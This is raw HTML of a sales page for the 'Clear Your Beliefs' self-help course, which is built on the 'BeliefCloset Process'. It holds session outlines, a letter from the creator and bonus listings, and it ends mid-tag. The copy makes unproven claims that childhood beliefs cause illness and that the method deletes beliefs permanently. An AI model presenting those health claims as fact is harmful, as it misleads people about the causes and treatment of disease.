src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<div class="parg-text"><p>A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p></div>\n\n&nbsp;\n\n&nbsp;\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<div class="parg-text"><p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<div class="parg-text"><p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<div class="parg-text"><p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<div class="parg-text"><p>Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<div class="parg-text"><p><strong> <span style="color: #000080;">It’s that simple.</span></strong></p></div></div></div></div>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\n<div class="parg-text"><p>Many people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p></div>\n\n<div class="parg-text"><p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p></div>\n\n<div class="parg-text"><p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.</p></div>\n\n<div class="parg-text"><p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p></div>\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\n<div class="parg-text"><p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p></div>\n\n<div class="parg-text"><p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p></div>\n\n<p><ul class="indented-img-left"><br />\n	<li>Why did I say that?</li>\n	<li>What’s wrong with me?</li>\n	<li>Why didn’t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul></p>\n<em>\n<div class="parg-text"><p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p></div>\n\n<div class="parg-text"><p>These programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p></div>\n\n<div class="parg-text"><p><strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong></p></div>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<div class="parg-text"><p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p></div>\n\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p></div><p><strong>Here''s why:</strong></p>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\n<div class="parg-text"><p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong></p></div>\n\n&nbsp;\n<h1>Here’s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\n<div class="parg-text"><p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.</p></div>\n\n<div class="parg-text"><p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p></div>\n\n<h1>Imagine The Life You Desire</h1>\n<div class="parg-text"><p><strong>Can you imagine this?</strong></p>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n <div class="parg-text"><p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<div class="parg-text"><p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<div class="parg-text"><p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<div class="parg-text"><p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<div class="parg-text"><p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<div class="parg-text"><p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong></p>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<div class="parg-text"><p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<div class="parg-text"><p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p>\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n <div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p></div>\n\n <div class="parg-text"><p>If you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p></div>\n\n <div class="parg-text"><p>During each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p></div>\n\n <div class="parg-text"><p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p></div>\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul class="check">\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li>\n</ul>\n</div>\n <div class="parg-text"><p><strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\n<div class="mb-img">\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.</p>\n\n<p>I was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"</p>\n\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)</p>\n\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.</p>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n\n<p>When your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!</p>\n\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n\n<p>Having worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.</p>\n\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n\n<p>A lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n\n<p>In the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n\n<p>Live the life of your dreams. There’s nothing to stop you – except a few old beliefs...</p>\n\n<p>In gratitude, and with warm wishes for your total success,</p>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\n <div class="parg-text"><p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p></div>\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n\n<p>In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you.  It’s time to discard them and clear some space!  You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.</p>\n\n<p>What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It’s time to haul them out, and toss them out! You don’t need them anymore.  If you hear critical inner voices berating you, don’t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is “Anything...” you don’t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>“What’s the use?  You’ll fail anyway. You don’t deserve happiness – look at you!”  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.\n\nIf you’re married, are you happy and secure?   Or are you anxious about the future?   If you’re not in a relationship, what’s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned “what love is” from your parents – so it’s no wonder that you’re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today’s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can’t seem to stop hurting each other. What’s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div 